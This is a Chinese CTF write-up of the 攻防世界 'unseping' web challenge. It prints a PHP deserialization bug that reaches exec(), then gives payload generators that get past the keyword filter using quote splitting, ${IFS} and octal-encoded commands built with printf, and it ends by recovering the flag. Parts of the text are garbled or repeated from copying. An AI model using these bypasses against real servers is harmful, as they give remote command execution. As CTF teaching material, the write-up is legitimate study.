攻防世界37-unseping-CTFWeb
php"><?php
highlight_file(__FILE__);class ease{private $method;private $args;function __construct($method, $args) {$this->method = $method;$this->args = $args;}function __destruct(){if (in_array($this->method, array("ping"))) {call_user_func_array(array($this, $this->method), $this->args);}} function ping($ip){exec($ip, $result);var_dump($result);}function waf($str){if (!preg_match_all("/(\||&|;| |\/|cat|flag|tac|php|ls)/", $str, $pat_array)) {return $str;} else {echo "don't hack";}}function __wakeup(){foreach($this->args as $k => $v) {$this->args[$k] = $this->waf($v);}}
}$ctf=@$_POST['ctf'];
@unserialize(base64_decode($ctf));
?>
if (!preg_match_all(“/(||&|;| |/|cat|flag|tac|php|ls)/”, $str, $pat_array))做了过滤
且if (in_array($this->method, array(“ping”))),ping必须是method
这是一个反序列化问题
随便试一试,得到输出
php"><?php
class ease{private $method;private $args;function __construct($method, $args) {$this->method = $method;$this->args = $args;}}$o=new ease("ping",array("ifconfig"));
$s = serialize($o);
echo base64_encode($s);
?>
ls被过滤了,有几种绕过方法
- 单引号,有效
- 双引号,有效
- I F S , {IFS}, IFS,{Z}有效
- l\s也行
空格被过滤了
php"><?php
class ease{private $method;private $args;function __construct($method, $args) {$this->method = $method;$this->args = $args;}}$o=new ease("ping",array('l""s${IFS}f""lag_1s_here'));
$s = serialize($o);
echo base64_encode($s);
?>
/\都被过滤了
使用8进制编码"/",“/“的八进制编码为\57,使用 ( p r i n t f (printf (printf{IFS}”\57”)内敛执行输出“/”到字符串中
php"><?php
class ease{private $method;private $args;function __construct($method, $args) {$this->method = $method;$this->args = $args;}}$o = new ease('ping', array('more${IFS}fl""ag_1s_here$(printf${IFS}"\57")f\lag_831b69012c67b35f.p\hp'));
//$o = new ease('ping', array('c""at${IFS}fl""ag_1s_here$(printf${IFS}"\57")f""lag_831b69012c67b35f.p""hp'));
//
$s = serialize($o);
echo base64_encode($s);
?>
得cyberpeace{305550cf468dbcfe0d6f5f0356c42ab4}
然后手动加斜杠也行
php"><?php
class ease{private $method;private $args;function __construct($method, $args) {$this->method = $method;$this->args = $args;}}
$o=new ease("ping",array('$(printf${IFS}"\143\141\164\40\146\154\141\147\137\61\163\137\150\145\162\145\57\146\154\141\147\137\70\63\61\142\66\71\60\61\62\143\66\67\142\63\65\146\56\160\150\160")'));
$s = serialize($o);
echo base64_encode($s);
?>
\57\146\154\141\147\137\70\63\61\142\66\71\60\61\62\143\66\67\142\63\65\146\56\160\150\160")'));
s = s e r i a l i z e ( s = serialize( s=serialize(o);
echo base64_encode($s);
?>
